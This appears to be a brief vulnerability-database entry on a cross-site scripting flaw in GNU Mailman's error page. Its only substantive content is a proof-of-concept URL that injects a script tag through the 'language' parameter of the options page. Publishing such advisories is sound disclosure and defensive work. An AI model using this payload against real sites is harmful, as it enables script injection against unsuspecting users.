• info
• discussion
• exploit
• solution
• references

GNU Mailman Error Page Cross Site Scripting Vulnerability

The following proof of concept has been made available:

https://www.yourserver.com:443//mailman/options/yourlist?
language=<SCRIPT>alert('Can%20Cross%20Site%20Attack')</SCRIPT>